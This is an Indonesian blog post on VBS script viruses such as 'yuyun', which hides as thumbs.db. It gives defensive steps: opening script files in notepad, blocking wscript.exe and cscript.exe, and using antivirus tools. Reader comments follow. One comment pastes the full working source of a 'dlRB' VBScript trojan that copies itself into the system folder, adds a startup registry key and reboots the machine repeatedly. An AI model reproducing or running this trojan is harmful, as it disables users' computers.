Perkembangan Virus VBS dan cara mengatasinya

Virus VBS  beraksi menggunakan script visual basic atau sering dikenal dengan nama virus vbs.So pasti extentionnya *.vbs maka untuk ngatasinya agar computer kita tidak kena efek virus tsb,caranya forder options>file types>untuk files extention vbs,vbe,js,jse,wsf,wsh, pilih change notepad terus ok untuk default opennya.maka kita akan belajar banyak dari virus lewat notepad.
Update : 30 mei 2009
Tapi dalam perkembangannya Sekarang yang dijalankan bukan vbs-nya lebih dulu , tapi kompilernya yaitu wscript.exe-nya. Jadi urutannya yang dulu file vbs dijalankan kemudian kompiler di panggil untuk menjalankan file vbs tersebut. Tetapi Sekarang Kompiler dipanggil dulu kemudian diperintah menjalankan file Vbs tertentu yang mungkin bisa dirubah extension-nya menjadi berextension lain seperti Virus yuyun yang file virus-nya sebenarnya adalah thumb.vbs dirubah menjadi thumb.db . Ini berfungsi untuk mengelabuhi user, karena dengan extension .db dianggap user adalah thumbs.db file thumbnails-nya Windows.
Kalau untuk menghentikan Virus VBS yang TYpe ini , kita dapat menghentikan file kompilernya , yaitu wscript.exe
Caranya :

1.Matikan fungsi Wscript.exe,caranya menggunakan gpedit.msc>administrative templates>System>Double click Don’t run specified Windows applications>enabled>show>tambahkan Wscript.exe dan cscript.exe>ok.Dengan cara ini semua virus vbscript tidak akan tereksekusi.

2.Gunakan antivirus pcmav bisa download di sini atau anti virus lainnya seperti smadav atau ansav yang telah mendeteksi virus ini .Sebelumnya endtask wscript.exe yang berjalan di processes task manager.

Atau silakan download di-link yang saya sediakan di download Anti Virus dan Update Unti Virus..

Kita harus waspada dengan virus sekarang , yang kemungkinan akan berkembang lebih canggih lagi… 🙂

Tentang Mpu-Elcom

Sholatku , ibadahku , hidupku , dan matiku , ku persembahkan untuk Allah tuhan Alam semesta...
Pos ini dipublikasikan di Tips&Triks dan tag , , . Tandai permalink.

7 Balasan ke Perkembangan Virus VBS dan cara mengatasinya

  1. Agara berkata:

    Virus yuyun…😀
    sya pernah mendapat komputer temn yang terjangkit virus tersebut dan teman tersebut mengeluh saat mnghidupkan komputer printer langsung memprint lembaran yag dijalankan oleh virus yuyun dengan bunyi seprti ayat qur’an gtu….saya sempat kewalahn menanganinya …seperti mendelete smua virus yuyun tsb …klu g’ salah ada 3 buah yg dijalankan oleh autorun saya lupa2 ingat😀

    saya teringat kepada starup untuk mengatasi komp yg baru dihidupkan0 langsug ngeprint saya masuk ke MSCOnfig dan akhrinya ktemu juga biang keroknya dan menyelesaikanya .

    mas saya ingin minta tolong nie😀

    saya lgi nyusun skripsi dengn judul menangani berbagai virus VBScript bisa saya minta artikel ttg permasalhnya mas

    dan sekalian mas contoh script virusnya mas untuk mengtehuinya mas😀

    terima kasih mas

    wassalam

  2. hendry berkata:

    bos..nanya nih.ane dah terapkan seperti kata ente tapi virus “change.vbs” masih ada.pake pcm4v juga tetep ada..jadi setiap kali ane ganti pasword user untuk login slalu di rubah lagi sesuai paswd didalam file “change.vbs” than solusinya..

  3. Mpu-Elcom berkata:

    Mungkin yang sampeyan lupa🙂
    1. File Virus dieksekusi saat start up cara mengatasinya gunakan msconfig dimenu Run lihat startup file mungkin ada file Virus yang dijalankan ( hilangkan cek list dan hapus file tujuan ) atau bisa juga gunakan software ( hijackthis )
    2. Sampeyan belum menghentikan fungsi wscript.exe , coba sampeyan baca di mengatasi virus yuyun , karena bila kita scan dangan smadav atau EURA anti virus fungsi wscript.exe akan kembali…silakan disable lagi setelah di scan.

  4. Mpu-Elcom berkata:

    Untuk contohnya , khan sudah saya tampilkan ( virus yuyun ) , untuk Virus VBScript murni ( belum digabung dengan exe ) itu Compilernya ya wscript.exe , mungkin coba sampeyan kembangkan sendiri🙂 trim’s

  5. Jan Ivhansen berkata:

    Wah Gan.. Klo gk nyampe blog ini mungkin skripsi ane keapus semua..
    Trims Banyak ya atas ilmunya..

  6. imam berkata:

    rem – dlRB “DL Reboot” Trojan script by D.L.

    On Error Resume Next
    dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData

    set FSobj=CreateObject(“Scripting.FileSystemObject”)
    set sysDir = FSobj.GetSpecialFolder(1)

    createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”

    sub createRegKey(regKey,regVal)
    set regEdit = CreateObject(“WScript.Shell”)
    regEdit.RegWrite regKey,regVal
    end sub

    set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
    generateCopy.close

    set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
    setFile()
    fixedCode=replace(fileData,chr(94),””””)

    set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
    procreateCopy.write fixedCode
    procreateCopy.close

    rebootSystem()

    function setFile()
    fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
    “strComputer = ^.^ ” &vbcrlf& _
    “Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
    “& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
    “Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
    “(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
    “For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
    “ObjOperatingSystem.Reboot()” &vbcrlf& _
    “Next”
    end function

    function rebootSystem()
    strComputer = “.”

    Set objWMIService = GetObject(“winmgmts:” _
    & “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2”)

    Set colOperatingSystems = objWMIService.ExecQuery _
    (“Select * from Win32_OperatingSystem”)

    For Each objOperatingSystem in colOperatingSystems
    ObjOperatingSystem.Reboot()
    Next
    end function

    cara mematikanya gimana itu…

  7. Mpu-Elcom berkata:

    @imam : maaf saya kurang menguasai Vbs script… mungkin ada dari teman2 yang bisa bantu..monggo..

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s